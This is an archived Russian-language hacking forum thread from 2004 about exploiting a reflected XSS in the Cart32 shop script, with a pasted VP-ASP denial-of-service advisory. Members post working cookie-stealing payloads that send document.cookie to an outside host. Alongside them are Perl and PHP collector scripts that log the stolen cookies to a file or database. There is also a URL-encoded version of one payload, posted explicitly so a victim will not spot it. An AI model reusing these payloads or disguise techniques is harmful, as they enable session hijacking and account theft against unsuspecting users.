Просмотр полной версии : Shop
как реальзовать данную уязвимость шопа
scripts/cart32.exe/GetLatestBuilds?cart32=<script>alert('XSS')</script>
для получения полезного
JazzzSummerMan
16.09.2004, 12:36
Дай полный адрес
Че Гевара
16.09.2004, 17:54
PUMA, а смысл использовать xss, если это подействует только на тебя ?
стукните кто разбирается баг нераспространённый
не хочу чтоб в массы вышел...
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (PUMA @ сентября 15 2004,15:46)</td></tr><tr><td id="QUOTE">scripts/cart32.exe/GetLatestBuilds?cart32=<script>alert('XSS'http://forum.antichat.ru/iB_html/non-cgi/emoticons/wink.gif</script>[/QUOTE]<span id='postcolor'>
По-моему от таких уязвимостей толку - ноль...
Этот скрипт срабатывает только у того, кто отправил данный запрос... Какой в этом смысл ?
JazzzSummerMan
17.09.2004, 14:23
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (PUMA @ сентября 16 2004,20:52)</td></tr><tr><td id="QUOTE">стукните кто разбирается баг нераспространённый
не хочу чтоб в массы вышел...[/QUOTE]<span id='postcolor'>
Да))) Баг действительно нераспространенный) Скажу больше, это даже не баг фактически. Скрывай его дальше
Потом продашь кому-нибудь.
Ну а если по существу, можно конечно найти этому применение, только вероятность совсем невелика. Тем более, чтобы найти уязвимость, нужно хотя бы сами куки для начала посмотреть, и личный кабинет юзера, поэтому и спрашивал полный УРЛ
ну вот можно купить чтонибудь ///
а вот ещё один ктонибудь сможет реализовать ?
VP-ASP 'shoprestoreorder.asp' May Let Remote Users Keep Database Connections Open
A denial of service vulnerability was reported in VP-ASP. A remote user can consume database resources on the target system.
The vendor reported that a remote user can restore a previous order using 'shoprestoreorder.asp' to potentially cause a database connection to stay open. The vendor indicates that this can cause performance issues.
Impact: A remote user may be able to cause database connections to stay open.
Solution: The vendor has described a fix for 'shoprestoreorder.asp':
acidhack
09.10.2004, 04:42
А если по-думать головой?
<script>document.location.href='http://target.com/cgi-bin/cookie.cgi?' + document.cookie;</script>
(cookie.cgi)
#!/usr/bin/perl -w
open COOKIES,">>../cookies.txt";
print "Content-Type: text/html\n\n";
print COOKIES "----------- new cookie -----------\n";
print COOKIES "$ENV{'QUERY_STRING'}\n";
print COOKIES "---------- end of cookie ---------\n\n";
close COOKIES;
http://forum.antichat.ru/iB_html/non-cgi/emoticons/devil.gif
Че Гевара
09.10.2004, 18:47
acidhack, это примитивный вариант скрипта снифера ... Лучше использовать наш ... Да и не факт, что кукисы будут полезны ...
PEPSICOLA
06.11.2004, 09:13
acidhack - Мне типа слово "COOKIES" напоминает кучку маленьких пирожков http://forum.antichat.ru/iB_html/non-cgi/emoticons/biggrin.gif
О! круто! Я догнал!!! А можно сделать так?
www.xxx.ru/?search=<script>document.images[0].src='http://www.yyy.ru/?с'+document.cookie;</script>
А в http://www.yyy.ru/ написать что-то типа
<?
$u_ip=htmlspecialchars(getenv("REMOTE_ADDR"), ENT_QUOTES);
$u_agent=htmlspecialchars(getenv("HTTP_USER_AGENT"), ENT_QUOTES);
$u_ref=htmlspecialchars(getenv("HTTP_REFERER"), ENT_QUOTES);
$u_cookie=htmlspecialchars($c, ENT_QUOTES);
mysql_unbuffered_query("INSERT INTO table VALUES('', '$u_ip', '$u_agent', '$u_ref', '$u_cookie')") or die();
header("Content-type: image/png");
$im=imagecreate(100, 100);
$bgcolor=imagecolorallocate($im, 255, 255, 255);
$tcolor=imagecolorallocate($im, 233, 14, 91);
imagestring($im, 1, 5, 5, "Hackered", $tcolor);
imagepng($im);
imagedestroy($im);
?>
Кинуть ламаку, типа на, погляди, я сайт ломанул, по идее его кука с этого сайта мне в БД, а он вместо первой картини сайта видит имагу 100 на 100 с надписью "Hackered", круто! Но есть одно но. Если он не такой и ламак, то перед тем как вставит код в браузер, проглядит его. Думаю его смутит строчка
http://www.yyy.ru/?с'+document.cookie... Что тогда делать? Ыдь у нас java-inj, помойму можно как-то зашифровать весь скрипт, типа чтоб нельзя бло увидеть код скрипта, чтоб были одни кракозяборы... Круто!!! Блин помогите, будет ли ваще все это вашенаписанное работать, и если да, то как зашифровать строку? Ребят, респект =)
xxx.ru/?search=%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65 %6E%74%2E%69%6D%61%67%65%73%5B%30%5D%2E%73%72%63%3 D%27%68%74%74%70%3A%2F%2F%77%77%77%2E%79%79%79%2E% 72%75%2F%3F%F1%27%2B%64%6F%63%75%6D%65%6E%74%2E%63 %6F%6F%6B%69%65%3B%3C%2F%73%63%72%69%70%74%3E
(без пробелов - их форум автоматически вставляет)
АААА =)))) че то до меня сразу то не дошло =))) все равно спасибо.
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot